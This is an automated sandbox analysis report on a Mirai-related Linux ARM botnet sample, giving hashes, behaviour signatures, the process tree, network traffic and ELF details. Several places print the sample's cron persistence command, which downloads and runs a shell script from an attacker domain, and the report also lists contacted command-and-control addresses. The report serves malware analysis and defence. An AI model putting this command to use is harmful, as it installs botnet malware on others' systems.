Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshkarm.elf

Overview

General Information

Sample name:nshkarm.elf
Analysis ID:1576787
MD5:0ca916db64f11f41d5398a921b17f03d
SHA1:cc58d153c591a329a0312f6d0b4490df874ca51e
SHA256:aef5642907d2349271ba29b866800d26beb5eb8831bcc217529e6585b242bc89
Tags:elfuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1576787
Start date and time:2024-12-17 15:17:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshkarm.elf
Detection:MAL
Classification:mal60.troj.linELF@0/1@12/0
  • VT rate limit hit for: nshkarm.elf
Command:/tmp/nshkarm.elf
PID:6246
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
  • system is lnxubuntu20
  • dash New Fork (PID: 6221, Parent: 4332)
  • rm (PID: 6221, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35
  • dash New Fork (PID: 6222, Parent: 4332)
  • rm (PID: 6222, Parent: 4332, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35
  • nshkarm.elf (PID: 6246, Parent: 6150, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nshkarm.elf
    • sh (PID: 6248, Parent: 6246, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 6250, Parent: 6248)
        • sh New Fork (PID: 6252, Parent: 6250)
        • crontab (PID: 6252, Parent: 6250, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 6251, Parent: 6248)
      • crontab (PID: 6251, Parent: 6248, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshkarm.elfReversingLabs: Detection: 21%
Source: tmp.IVIgeR.22.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 80.78.26.121 ports 9641,9535,6052,1,3,4,1443
Source: global trafficTCP traffic: 212.64.215.71 ports 7237,17375,0,1,3,7,9,13079
Source: global trafficTCP traffic: 192.168.2.23:55686 -> 212.64.215.71:13079
Source: global trafficTCP traffic: 192.168.2.23:34836 -> 80.78.26.121:1443
Source: /tmp/nshkarm.elf (PID: 6246)Socket: 127.0.0.1:1172Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: unknownUDP traffic detected without corresponding DNS query: 152.53.15.127
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 217.160.70.42
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 65.21.1.106
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: tmp.IVIgeR.22.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal60.troj.linELF@0/1@12/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 6252)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 6251)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /usr/bin/crontab (PID: 6251)File: /var/spool/cron/crontabs/tmp.IVIgeRJump to behavior
Source: /usr/bin/crontab (PID: 6251)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshkarm.elf (PID: 6248)Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /usr/bin/dash (PID: 6221)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35Jump to behavior
Source: /usr/bin/dash (PID: 6222)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.3IVLCyEXtn /tmp/tmp.TBRSZCPExN /tmp/tmp.0oqxZm1t35Jump to behavior
Source: submitted sampleStderr: no crontab for root: exit code = 0
Source: /tmp/nshkarm.elf (PID: 6246)Queries kernel information via 'uname': Jump to behavior
Source: nshkarm.elf, 6246.1.000055f593aef000.000055f593c43000.rw-.sdmp, nshkarm.elf, 6253.1.000055f593aef000.000055f593c43000.rw-.sdmp, nshkarm.elf, 6296.1.000055f593aef000.000055f593c43000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: nshkarm.elf, 6246.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmp, nshkarm.elf, 6253.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmp, nshkarm.elf, 6296.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/nshkarm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkarm.elf
Source: nshkarm.elf, 6246.1.000055f593aef000.000055f593c43000.rw-.sdmp, nshkarm.elf, 6253.1.000055f593aef000.000055f593c43000.rw-.sdmp, nshkarm.elf, 6296.1.000055f593aef000.000055f593c43000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nshkarm.elf, 6246.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmp, nshkarm.elf, 6253.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmp, nshkarm.elf, 6296.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nshkarm.elf, 6296.1.00007ffc20db0000.00007ffc20dd1000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576787 Sample: nshkarm.elf Startdate: 17/12/2024 Architecture: LINUX Score: 60 32 212.64.215.71, 13079, 17375, 51780 RACKSPACE-LONGB Turkey 2->32 34 109.202.202.202, 80 INIT7CH Switzerland 2->34 36 3 other IPs or domains 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Connects to many ports of the same IP (likely port scanning) 2->40 9 dash rm nshkarm.elf 2->9         started        11 dash rm 2->11         started        signatures3 process4 process5 13 nshkarm.elf sh 9->13         started        15 nshkarm.elf 9->15         started        17 nshkarm.elf 9->17         started        process6 19 sh crontab 13->19         started        23 sh 13->23         started        25 nshkarm.elf 15->25         started        file7 30 /var/spool/cron/crontabs/tmp.IVIgeR, ASCII 19->30 dropped 42 Sample tries to persist itself using cron 19->42 44 Executes the "crontab" command typically for achieving persistence 19->44 27 sh crontab 23->27         started        signatures8 process9 signatures10 46 Executes the "crontab" command typically for achieving persistence 27->46
SourceDetectionScannerLabelLink
nshkarm.elf21%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
kingstonwikkerink.dyn
80.78.26.121
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://hailcocks.ru/wget.sh;tmp.IVIgeR.22.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      80.78.26.121
      kingstonwikkerink.dynCyprus
      37560CYBERDYNELRfalse
      212.64.215.71
      unknownTurkey
      15395RACKSPACE-LONGBtrue
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
      91.189.91.43la.bot.arm6.elfGet hashmaliciousMiraiBrowse
        la.bot.m68k.elfGet hashmaliciousMiraiBrowse
          la.bot.mips.elfGet hashmaliciousMiraiBrowse
            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                la.bot.arm.elfGet hashmaliciousMiraiBrowse
                  la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                    nk41.elfGet hashmaliciousUnknownBrowse
                      hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                        hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                          91.189.91.42la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                  la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                    la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                      la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                        nk41.elfGet hashmaliciousUnknownBrowse
                                          hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CANONICAL-ASGBla.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                              • 91.189.91.42
                                              la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                              • 185.125.190.26
                                              nk41.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              RACKSPACE-LONGBi686.elfGet hashmaliciousMiraiBrowse
                                              • 92.52.99.131
                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 89.234.28.7
                                              Josho.arm.elfGet hashmaliciousUnknownBrowse
                                              • 89.234.45.46
                                              https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                              • 134.213.193.62
                                              meerkat.mips.elfGet hashmaliciousMiraiBrowse
                                              • 134.213.250.148
                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              • 162.13.153.221
                                              teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                              • 92.52.99.126
                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 89.234.45.54
                                              m68k.elfGet hashmaliciousMiraiBrowse
                                              • 5.79.3.85
                                              https://fparnter-externet.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                              • 134.213.193.62
                                              CYBERDYNELRGjNVpV53SR.exeGet hashmaliciousQuasarBrowse
                                              • 80.78.28.83
                                              p-p.c-440.DUSK.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.193.127.129
                                              PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
                                              • 80.78.24.30
                                              FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                                              • 80.78.24.30
                                              PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
                                              • 80.78.24.30
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.193.127.129
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.193.127.129
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.193.127.129
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.193.127.129
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.193.127.129
                                              INIT7CHla.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              nk41.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 109.202.202.202
                                              hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 109.202.202.202
                                              No context
                                              No context
                                              Process:/usr/bin/crontab
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):306
                                              Entropy (8bit):5.157134578854361
                                              Encrypted:false
                                              SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvpUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8WeHLUHYC+GABjnOGAFkz
                                              MD5:542B8F21550244BB1D2E2FEAAF4C724B
                                              SHA1:CBB7E4471B27D2CB992E478F1B554C4E08B4B197
                                              SHA-256:200CFCA9F347C0FC53FBC84F14F740C2DCF98F49026C8339BBD359FEA62FECB7
                                              SHA-512:0649A492D6E8622054E019156C31C12DA65C460BF7ED9076E91584A9FD9F6009778410AFCC96BA9D570DD4814A1E5D3D5AB7423F1BA8AB6FC639AA8233190741
                                              Malicious:true
                                              Reputation:low
                                              Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 08:17:57 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                              Entropy (8bit):6.120978968859602
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:nshkarm.elf
                                              File size:76'232 bytes
                                              MD5:0ca916db64f11f41d5398a921b17f03d
                                              SHA1:cc58d153c591a329a0312f6d0b4490df874ca51e
                                              SHA256:aef5642907d2349271ba29b866800d26beb5eb8831bcc217529e6585b242bc89
                                              SHA512:7ea4a9f195680ee596a3674d8c6cab5baaa57b0c85972cd07cb08835421880c27320f64d9977eb9ca8c721de34c90bb39d756c9c6f43c248edda351dfaf26407
                                              SSDEEP:768:UwxxdU9ZaN3A0Lljcjclxz7zHHcf6Eg/1WW2CQuoNDdSf4p5NdjMlNofRHeR++Ev:LxxcEJb74fEA0f4HolCRLZlyQIsgvj
                                              TLSH:88732981BD815A13C6D112BBFB2E418D772713A8D2EE7203DE25AF21778792B0E77641
                                              File Content Preview:.ELF...a..........(.........4...8(......4. ...(.....................`$..`$..............d$..d$..d$.......T..........Q.td..................................-...L."...xB..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:ARM
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:ARM - ABI
                                              ABI Version:0
                                              Entry Point Address:0x8190
                                              Flags:0x202
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:75832
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x80940x940x180x00x6AX004
                                              .textPROGBITS0x80b00xb00x10a180x00x6AX0016
                                              .finiPROGBITS0x18ac80x10ac80x140x00x6AX004
                                              .rodataPROGBITS0x18adc0x10adc0x19840x00x2A004
                                              .ctorsPROGBITS0x224640x124640x80x00x3WA004
                                              .dtorsPROGBITS0x2246c0x1246c0x80x00x3WA004
                                              .dataPROGBITS0x224780x124780x3800x00x3WA004
                                              .bssNOBITS0x227f80x127f80x50fc0x00x3WA004
                                              .shstrtabSTRTAB0x00x127f80x3e0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x80000x80000x124600x124606.15120x5R E0x8000.init .text .fini .rodata
                                              LOAD0x124640x224640x224640x3940x54902.86840x6RW 0x8000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 17, 2024 15:17:56.134092093 CET43928443192.168.2.2391.189.91.42
                                              Dec 17, 2024 15:17:57.965347052 CET5568613079192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:17:58.085562944 CET1307955686212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:17:58.085664034 CET5568613079192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:17:58.085928917 CET5568613079192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:17:58.206590891 CET1307955686212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:17:58.206710100 CET5568613079192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:17:58.326404095 CET1307955686212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:17:59.560482979 CET1307955686212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:17:59.560750008 CET5568613079192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:17:59.560918093 CET5568613079192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:18:01.509500980 CET42836443192.168.2.2391.189.91.43
                                              Dec 17, 2024 15:18:02.277299881 CET4251680192.168.2.23109.202.202.202
                                              Dec 17, 2024 15:18:04.828728914 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:04.948472023 CET14433483680.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:04.948628902 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:04.948692083 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:05.068530083 CET14433483680.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:05.068764925 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:05.188649893 CET14433483680.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:14.957513094 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:15.077346087 CET14433483680.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:15.254098892 CET14433483680.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:15.254240990 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:15.254306078 CET348361443192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:16.355268955 CET43928443192.168.2.2391.189.91.42
                                              Dec 17, 2024 15:18:25.554858923 CET358689641192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:25.674645901 CET96413586880.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:25.674751043 CET358689641192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:25.674947023 CET358689641192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:25.794485092 CET96413586880.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:25.794864893 CET358689641192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:25.914522886 CET96413586880.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:28.641629934 CET42836443192.168.2.2391.189.91.43
                                              Dec 17, 2024 15:18:29.963634014 CET96413586880.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:29.964016914 CET358689641192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:29.964016914 CET358689641192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:32.736934900 CET4251680192.168.2.23109.202.202.202
                                              Dec 17, 2024 15:18:50.220511913 CET520526052192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:50.340203047 CET60525205280.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:50.340451002 CET520526052192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:50.340517998 CET520526052192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:50.460208893 CET60525205280.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:50.460355997 CET520526052192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:18:50.580010891 CET60525205280.78.26.121192.168.2.23
                                              Dec 17, 2024 15:18:57.309533119 CET43928443192.168.2.2391.189.91.42
                                              Dec 17, 2024 15:19:00.646754980 CET60525205280.78.26.121192.168.2.23
                                              Dec 17, 2024 15:19:00.646958113 CET520526052192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:19:00.646994114 CET520526052192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:19:10.963161945 CET517807237192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:11.083008051 CET723751780212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:11.083235025 CET517807237192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:11.083235025 CET517807237192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:11.202831030 CET723751780212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:11.203069925 CET517807237192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:11.322649002 CET723751780212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:12.555401087 CET723751780212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:12.556108952 CET517807237192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:12.556108952 CET517807237192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:17.800957918 CET5933417375192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:17.921132088 CET1737559334212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:17.921292067 CET5933417375192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:17.921494007 CET5933417375192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:18.041034937 CET1737559334212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:18.041264057 CET5933417375192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:18.161494017 CET1737559334212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:19.397440910 CET1737559334212.64.215.71192.168.2.23
                                              Dec 17, 2024 15:19:19.397739887 CET5933417375192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:19.397778988 CET5933417375192.168.2.23212.64.215.71
                                              Dec 17, 2024 15:19:24.665359974 CET494389535192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:19:24.784869909 CET95354943880.78.26.121192.168.2.23
                                              Dec 17, 2024 15:19:24.784997940 CET494389535192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:19:24.785069942 CET494389535192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:19:24.904967070 CET95354943880.78.26.121192.168.2.23
                                              Dec 17, 2024 15:19:24.905050039 CET494389535192.168.2.2380.78.26.121
                                              Dec 17, 2024 15:19:25.024735928 CET95354943880.78.26.121192.168.2.23
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 17, 2024 15:17:57.697324038 CET5421253192.168.2.23185.181.61.24
                                              Dec 17, 2024 15:17:57.892610073 CET4722753192.168.2.23185.181.61.24
                                              Dec 17, 2024 15:17:57.959239006 CET5354212185.181.61.24192.168.2.23
                                              Dec 17, 2024 15:17:58.147958040 CET5347227185.181.61.24192.168.2.23
                                              Dec 17, 2024 15:17:58.150461912 CET4312953192.168.2.23202.61.197.122
                                              Dec 17, 2024 15:17:58.395908117 CET5343129202.61.197.122192.168.2.23
                                              Dec 17, 2024 15:17:58.397948027 CET5958453192.168.2.23185.181.61.24
                                              Dec 17, 2024 15:17:58.657967091 CET5359584185.181.61.24192.168.2.23
                                              Dec 17, 2024 15:17:58.661374092 CET5031553192.168.2.235.161.109.23
                                              Dec 17, 2024 15:18:04.563355923 CET5996153192.168.2.2365.21.1.106
                                              Dec 17, 2024 15:18:04.827590942 CET535996165.21.1.106192.168.2.23
                                              Dec 17, 2024 15:18:06.671763897 CET6071753192.168.2.23152.53.15.127
                                              Dec 17, 2024 15:18:06.913773060 CET5360717152.53.15.127192.168.2.23
                                              Dec 17, 2024 15:18:20.257036924 CET5556353192.168.2.235.161.109.23
